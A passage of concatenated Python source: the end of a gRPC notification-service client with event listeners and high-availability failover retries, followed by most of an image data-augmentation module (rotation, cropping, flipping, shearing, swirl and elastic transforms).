return None
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def list_events_from_version(client, v, timeout_seconds: int = None):
request = ListAllEventsRequest(start_version=v, timeout_seconds=timeout_seconds)
response = client.notification_stub.listAllEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
return None
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def listen(client, s, v, w):
t = threading.current_thread()
flag = True if v is None else False
current_version = 0 if v is None else v
while getattr(t, '_flag', True):
if flag:
notifications = list_events(client, s, NOTIFICATION_TIMEOUT_SECONDS)
if len(notifications) > 0:
w.process(notifications)
current_version = notifications[len(notifications) - 1].version
flag = False
else:
notifications = list_events_from_version(client,
current_version,
NOTIFICATION_TIMEOUT_SECONDS)
if len(notifications) > 0:
w.process(notifications)
current_version = notifications[len(notifications) - 1].version
thread = threading.Thread(target=listen,
args=(self, start_time, version, watcher),
daemon=True)
thread.start()
self.lock.acquire()
try:
if self.threads.get(ALL_EVENTS_KEY) is None:
self.threads[ALL_EVENTS_KEY] = []
self.threads[ALL_EVENTS_KEY].append(thread)
finally:
self.lock.release()
return ThreadEventWatcherHandle(thread, ALL_EVENTS_KEY, self)
def stop_listen_events(self):
"""
Stop the global listening threads.
"""
self.lock.acquire()
try:
if ALL_EVENTS_KEY in self.threads:
threads = self.threads[ALL_EVENTS_KEY]
for thread in threads:
thread._flag = False
thread.join()
del self.threads[ALL_EVENTS_KEY]
finally:
self.lock.release()
def get_latest_version(self, key: str = None, namespace: str = None):
"""
get latest event's version by key.
:param key: Key of notification for listening.
:param namespace: Namespace of notification for listening.
:return: Version number of the specific key.
"""
self.lock.acquire()
try:
request = GetLatestVersionByKeyRequest(key=key,
namespace=self._default_namespace if namespace is None else namespace)
response = self.notification_stub.getLatestVersionByKey(request)
if response.return_code == str(ReturnStatus.SUCCESS):
return response.version
finally:
self.lock.release()
def disable_high_availability(self):
if hasattr(self, "ha_running"):
self.ha_running = False
self.list_member_thread.join()
def _list_members(self):
while self.ha_running:
# sleep for a `list_member_interval`
# sleep_and_detecting_running(self.list_member_interval_ms,
# lambda: self.ha_running)
# refresh the living members
request = ListMembersRequest(timeout_seconds=int(self.list_member_interval_ms / 1000))
response = self.notification_stub.listMembers(request)
if response.return_code == ReturnStatus.SUCCESS:
with self.ha_change_lock:
self.living_members = [proto_to_member(proto).server_uri
for proto in response.members]
else:
logging.error("Exception thrown when updating the living members: %s" %
response.return_msg)
def _ha_wrapper(self, func):
@wraps(func)
def call_with_retry(*args, **kwargs):
current_func = getattr(self.notification_stub,
func.__name__).inner_func
start_time = time.time_ns() / 1000000
failed_members = set()
while True:
try:
return current_func(*args, **kwargs)
except grpc.RpcError:
logging.error("Exception thrown when calling rpc, change the connection.",
exc_info=True)
with self.ha_change_lock:
# check the current_uri to ensure thread safety
if current_func.server_uri == self.current_uri:
living_members = list(self.living_members)
failed_members.add(self.current_uri)
shuffle(living_members)
found_new_member = False
for server_uri in living_members:
if server_uri in failed_members:
continue
next_uri = server_uri
channel = grpc.insecure_channel(next_uri)
notification_stub = self._wrap_rpcs(
notification_service_pb2_grpc.NotificationServiceStub(channel),
next_uri)
self.notification_stub = notification_stub
current_func = getattr(self.notification_stub,
current_func.__name__).inner_func
self.current_uri = next_uri
found_new_member = True
if not found_new_member:
logging.error("No available living members currently. Sleep and retry.")
failed_members.clear()
sleep_and_detecting_running(self.retry_interval_ms,
lambda: self.ha_running)
# break if stopped or timeout
if not self.ha_running or \
time.time_ns() / 1000000 > start_time + self.retry_timeout_ms:
if not self.ha_running:
raise Exception("HA has been disabled.")
else:
raise Exception("Rpc retry timeout!")
call_with_retry.inner_func = func
return call_with_retry
def _wrap_rpcs(self, stub, server_uri):
for method_name, method in dict(stub.__dict__).items():
method.__name__ = method_name
method.server_uri = server_uri
setattr(stub, method_name, self._ha_wrapper(method))
return stub
|
prepro.py | #! /usr/bin/python
# -*- coding: utf-8 -*-
import copy
import threading
import time
import numpy as np
import itl as tl
import scipy
import scipy.ndimage as ndi
from scipy import linalg
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates
import skimage
from skimage import exposure
from skimage import transform
from skimage.morphology import disk
from skimage.morphology import erosion as _erosion
from skimage.morphology import binary_dilation as _binary_dilation
from skimage.morphology import binary_erosion as _binary_erosion
from six.moves import range
import PIL
# linalg https://docs.scipy.org/doc/scipy/reference/linalg.html
# ndimage https://docs.scipy.org/doc/scipy/reference/ndimage.html
__all__ = [
'threading_data',
'rotation',
'rotation_multi',
'crop',
'crop_multi',
'flip_axis',
'flip_axis_multi',
'shift',
'shift_multi',
'shear',
'shear_multi',
'shear2',
'shear_multi2',
'swirl',
'swirl_multi',
'elastic_transform',
'elastic_transform_multi',
'zoom',
'zoom_multi',
'brightness',
'brightness_multi',
'illumination',
'rgb_to_hsv',
'hsv_to_rgb',
'adjust_hue',
'imresize',
'pixel_value_scale',
'samplewise_norm',
'featurewise_norm',
'get_zca_whitening_principal_components_img',
'zca_whitening',
'channel_shift',
'channel_shift_multi',
'drop',
'transform_matrix_offset_center',
'apply_transform',
'projective_transform_by_points',
'array_to_img',
'find_contours',
'pt2map',
'binary_dilation',
'dilation',
'binary_erosion',
'erosion',
'obj_box_coords_rescale',
'obj_box_coord_rescale',
'obj_box_coord_scale_to_pixelunit',
'obj_box_coord_centroid_to_upleft_butright',
'obj_box_coord_upleft_butright_to_centroid',
'obj_box_coord_centroid_to_upleft',
'obj_box_coord_upleft_to_centroid',
'parse_darknet_ann_str_to_list',
'parse_darknet_ann_list_to_cls_box',
'obj_box_left_right_flip',
'obj_box_imresize',
'obj_box_crop',
'obj_box_shift',
'obj_box_zoom',
'pad_sequences',
'remove_pad_sequences',
'process_sequences',
'sequences_add_start_id',
'sequences_add_end_id',
'sequences_add_end_id_after_pad',
'sequences_get_mask',
]
def threading_data(data=None, fn=None, thread_count=None, **kwargs):
"""Process a batch of data by given function by threading.
Usually be used for data augmentation.
Parameters
-----------
data : numpy.array or others
The data to be processed.
thread_count : int
The number of threads to use.
fn : function
The function for data processing.
more args : the args for `fn`
Ssee Examples below.
Examples
--------
Process images.
>>> images, _, _, _ = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3))
>>> images = tl.prepro.threading_data(images[0:32], tl.prepro.zoom, zoom_range=[0.5, 1])
Customized image preprocessing function.
>>> def distort_img(x):
>>> x = tl.prepro.flip_axis(x, axis=0, is_random=True)
>>> x = tl.prepro.flip_axis(x, axis=1, is_random=True)
>>> x = tl.prepro.crop(x, 100, 100, is_random=True)
>>> return x
>>> images = tl.prepro.threading_data(images, distort_img)
Process images and masks together (Usually be used for image segmentation).
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], tl.prepro.zoom_multi, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'images.png')
>>> tl.vis.save_image(Y_, 'masks.png')
Process images and masks together by using ``thread_count``.
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data(X, tl.prepro.zoom_multi, 8, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'after.png')
>>> tl.vis.save_image(Y_, 'before.png')
Customized function for processing images and masks together.
>>> def distort_img(data):
>>> x, y = data
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=0, is_random=True)
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=1, is_random=True)
>>> x, y = tl.prepro.crop_multi([x, y], 100, 100, is_random=True)
>>> return x, y
>>> X, Y --> [batch_size, row, col, channel]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], distort_img)
>>> X_, Y_ = data.transpose((1,0,2,3,4))
Returns
-------
list or numpyarray
The processed results.
References
----------
- `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__
- `run with limited queue <http://effbot.org/librarybook/queue.htm>`__
"""
def apply_fn(results, i, data, kwargs):
results[i] = fn(data, **kwargs)
if thread_count is None:
results = [None] * len(data)
threads = []
# for i in range(len(data)):
# t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs))
for i, d in enumerate(data):
t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, kwargs))
t.start()
threads.append(t)
else:
divs = np.linspace(0, len(data), thread_count + 1)
divs = np.round(divs).astype(int)
results = [None] * thread_count
threads = []
for i in range(thread_count):
t = threading.Thread(
name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], kwargs)
)
t.start()
threads.append(t)
for t in threads:
t.join()
if thread_count is None:
try:
return np.asarray(results)
except Exception:
return results
else:
return np.concatenate(results)
def rotation(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rg : int or float
Degree to rotate, usually 0 ~ 180.
is_random : boolean
If True, randomly rotate. Default is False
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode=`constant`. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1]
>>> x = tl.prepro.rotation(x, rg=40, is_random=False)
>>> tl.vis.save_image(x, 'im.png')
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def rotation_multi(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate multiple images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.rotation``.
Returns
-------
numpy.array
A list of processed images.
Examples
--------
>>> x, y --> [row, col, 1] greyscale
>>> x, y = tl.prepro.rotation_multi([x, y], rg=90, is_random=False)
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# crop
def crop(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop an image.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : int
Size of width.
hrg : int
Size of height.
is_random : boolean,
If True, randomly crop, else central crop. Default is False.
row_index: int
index of row.
col_index: int
index of column.
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
# tl.logging.info(h_offset, w_offset, x[h_offset: hrg+h_offset ,w_offset: wrg+w_offset].shape)
return x[h_offset:hrg + h_offset, w_offset:wrg + w_offset]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
return x[h_offset:h_end, w_offset:w_end]
# old implementation
# h_offset = (h - hrg)/2
# w_offset = (w - wrg)/2
# tl.logging.info(x[h_offset: h-h_offset ,w_offset: w-w_offset].shape)
# return x[h_offset: h-h_offset ,w_offset: w-w_offset]
# central crop
def crop_multi(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop multiple images.
Parameters
----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.crop``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
results = []
for data in x:
results.append(data[h_offset:hrg + h_offset, w_offset:wrg + w_offset])
return np.asarray(results)
else:
# central crop
h_offset = (h - hrg) / 2
w_offset = (w - wrg) / 2
results = []
for data in x:
results.append(data[h_offset:h - h_offset, w_offset:w - w_offset])
return np.asarray(results)
# flip
def flip_axis(x, axis=1, is_random=False):
"""Flip the axis of an image, such as flip left and right, up and down, randomly or non-randomly,
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
axis : int
Which axis to flip.
- 0, flip up and down
- 1, flip left and right
- 2, flip channel
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
else:
return x
else:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def flip_axis_multi(x, axis, is_random=False):
"""Flip the axises of multiple images together, such as flip left and right, up and down, randomly or non-randomly,
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.flip_axis``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
else:
return np.asarray(x)
else:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
# shift
def shift(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : float
Percentage of shift in axis x, usually -0.25 ~ 0.25.
hrg : float
Percentage of shift in axis y, usually -0.25 ~ 0.25.
is_random : boolean
If True, randomly shift. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shift_multi(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shift``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# shear
def shear(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Percentage of shear, usually -0.5 ~ 0.5 (is_random==True), 0 ~ 0.5 (is_random==False),
you can have a quick try by shear(X, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shear_multi(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
def shear2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
shear : tuple of two floats
Percentage of shear for height and width direction (0, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear rather than tl.prepro.shear2 ?"
)
if is_random:
shear[0] = np.random.uniform(-shear[0], shear[0])
shear[1] = np.random.uniform(-shear[1], shear[1])
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shear_multi2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear2``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear_multi rather than tl.prepro.shear_multi2 ?"
)
if is_random:
shear[0] = np.random.uniform(-shear[0], shear[0])
shear[1] = np.random.uniform(-shear[1], shear[1])
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# swirl
def swirl(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl an image randomly or non-randomly, see `scikit-image swirl API <http://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.swirl>`__
and `example <http://scikit-image.org/docs/dev/auto_examples/plot_swirl.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
center : tuple or 2 int or None
Center coordinate of transformation (optional).
strength : float
The amount of swirling applied.
radius : float
The extent of the swirl in pixels. The effect dies out rapidly beyond radius.
rotation : float
Additional rotation applied to the image, usually [0, 360], relates to center.
output_shape : tuple of 2 int or None
Shape of the output image generated (height, width). By default the shape of the input image is preserved.
order : int, optional
The order of the spline interpolation, default is 1. The order has to be in the range 0-5. See skimage.transform.warp for detail.
mode : str
One of `constant` (default), `edge`, `symmetric` `reflect` and `wrap`.
Points outside the boundaries of the input are filled according to the given mode, with `constant` used as the default. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
is_random : boolean,
If True, random swirl. Default is False.
- random center = [(0 ~ x.shape[0]), (0 ~ x.shape[1])]
- random strength = [0, strength]
- random radius = [1e-10, radius]
- random rotation = [-rotation, rotation]
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1] greyscale
>>> x = tl.prepro.swirl(x, strength=4, radius=100)
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x.shape[0]))
center_w = int(np.random.uniform(0, x.shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
max_v = np.max(x)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
x = x / max_v
swirled = skimage.transform.swirl(
x, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape, order=order,
mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
return swirled
def swirl_multi(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl multiple images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.swirl``.
Returns
-------
numpy.array
A list of processed images.
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x[0].shape[0]))
center_w = int(np.random.uniform(0, x[0].shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
results = []
for data in x:
max_v = np.max(data)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
data = data / max_v
swirled = skimage.transform.swirl(
data, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape,
order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
results.append(swirled)
return np.asarray(results)
# elastic_transform
def elastic_transform(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for image as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : numpy.array
A greyscale image.
alpha : float
Alpha value for elastic transformation.
sigma : float or sequence of float
The smaller the sigma, the more transformation. Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes.
mode : str
See `scipy.ndimage.filters.gaussian_filter <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.filters.gaussian_filter.html>`__. Default is `constant`.
cval : float,
Used in conjunction with `mode` of `constant`, the value outside the image boundaries.
is_random : boolean
Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x = tl.prepro.elastic_transform(x, alpha=x.shape[1]*3, sigma=x.shape[1]*0.07)
References
------------
- `Github <https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a>`__.
- `Kaggle <https://www.kaggle.com/pscion/ultrasound-nerve-segmentation/elastic-transform-for-data-augmentation-0878921a>`__
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
#
is_3d = False
if len(x.shape) == 3 and x.shape[-1] == 1:
x = x[:, :, 0]
is_3d = True
elif len(x.shape) == 3 and x.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(x.shape) != 2:
raise AssertionError("input should be grey-scale image")
shape = x.shape
dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
if is_3d:
return map_coordinates(x, indices, order=1).reshape((shape[0], shape[1], 1))
else:
return map_coordinates(x, indices, order=1).reshape(shape)
def elastic_transform_multi(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for images as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : list of numpy.array
List of greyscale images.
others : args
See ``tl.prepro.elastic_transform``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
shape = x[0].shape
if len(shape) == 3:
shape = (shape[0], shape[1])
new_shape = random_state.rand(*shape)
results = []
for data in x:
is_3d = False
if len(data.shape) == 3 and data.shape[-1] == 1:
data = data[:, :, 0]
is_3d = True
elif len(data.shape) == 3 and data.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(data.shape) != 2:
raise AssertionError("input should be grey-scale image")
dx = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
# tl.logging.info(data.shape)
if is_3d:
results.append(map_coordinates(data, indices, order=1).reshape((shape[0], shape[1], 1)))
else:
results.append(map_coordinates(data, indices, order=1).reshape(shape))
return np.asarray(results)
# zoom
def zoom(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
zoom_range : list or tuple
Zoom range for height and width.
